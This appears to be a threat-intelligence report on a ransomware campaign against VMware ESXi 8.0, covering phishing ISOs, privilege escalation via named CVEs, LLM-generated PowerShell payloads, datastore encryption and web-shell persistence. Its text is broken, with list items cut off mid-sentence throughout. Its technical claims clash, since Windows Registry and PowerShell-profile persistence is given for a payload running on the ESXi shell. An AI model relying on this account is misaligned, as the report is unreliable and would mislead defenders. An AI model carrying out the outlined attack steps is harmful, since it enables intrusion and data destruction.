Executive Summary: In April 2026, a novel fileless ransomware campaign emerged targeting VMware ESXi 8.0 environments. The attack leverages AI-generated PowerShell scripts to bypass traditional defenses, escalate privileges via CVE-2025-2085 (a disclosed but unpatched ESXi privilege escalation flaw), and encrypt datastores without dropping malicious executables. This marks a significant evolution in ransomware tactics, combining AI automation, living-off-the-land binaries (LOLBins), and VMware-specific exploitation. Early detection reveals a median dwell time of 4.2 hours, with full encryption achieved in under 30 minutes once access is secured.
esxcli, vim-cmd) to enumerate and encrypt VMFS datastores.vpxa agent configuration, ensuring persistence even after reboots.The campaign is attributed to a rebranded affiliate of the Shadow Syndicate group, now operating under the moniker AI-Xploit. This cluster has rapidly adopted AI-driven tooling, with evidence of collaboration with underground LLM fine-tuning services. Their infrastructure includes compromised Azure AI training nodes used to generate attack scripts.
The attack begins with phishing emails containing malicious ISO attachments. These mount as virtual drives and execute a decoy installer that sideloads a PowerShell script. The script abuses a deserialization flaw in VMware’s vSphere Client plugin (CVE-2025-3158, patched in March 2026 but still present in unpatched systems) to inject code into the vpxd service process. This grants the threat actor access to the vCenter Server API with administrative privileges.
Next, via PowerCLI, the attacker extracts SSH private keys from the vCenter’s credential store and uses them to authenticate to ESXi hosts over SSH. Once on the ESXi shell, they exploit CVE-2025-2085—a race condition in the hostd service—to escalate from the limited vpxuser to root.
The core ransomware payload is generated dynamically using a fine-tuned Mistral-7B model trained on offensive security research papers, red team reports, and leaked attack scripts. The LLM produces PowerShell code that:
Invoke-Expression (IEX) or Add-Type to compile C# inline.The script avoids writing to disk by storing configuration in environment variables and leveraging the Windows Registry for persistence via HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce.
The ransomware identifies ESXi 8.0 hosts using uname -r and queries the VMFS metadata via vmkfstools --queryfs. It then suspends all virtual machines using vim-cmd vmsvc/power.suspend [vmid] and creates snapshots to preserve chain integrity.
Encryption is performed in-place on VMDK files using a custom VMFS-aware module. The ransomware:
vmkfstools --mount.shred and sdelete-style patterns.To survive reboots, the ransomware implants a Web Shell in the VMware ESXi web UI using a zero-day in the ui/vSphereClient endpoint. This allows re-entry even after patching. Additionally, it disables VMware’s Security Configuration Automation Toolkit (SCAT) and modifies hostd firewall rules to block remote management tools.
Organizations running VMware ESXi 8.0 with unpatched vCenter or ESXi hosts are at critical risk. The median recovery time from such an attack exceeds 14 days, with total data loss in scenarios where backups are also compromised (e.g., via vCenter lateral movement). Financial losses average $4.7M per incident, including ransom demands (typically 12 BTC), downtime, and compliance fines (GDPR, HIPAA).
esxcli, vim-cmd, or vmkfstools from non-privileged users or external IPs.$PROFILE or HKLM\SOFTWARE\Microsoft\PowerShell.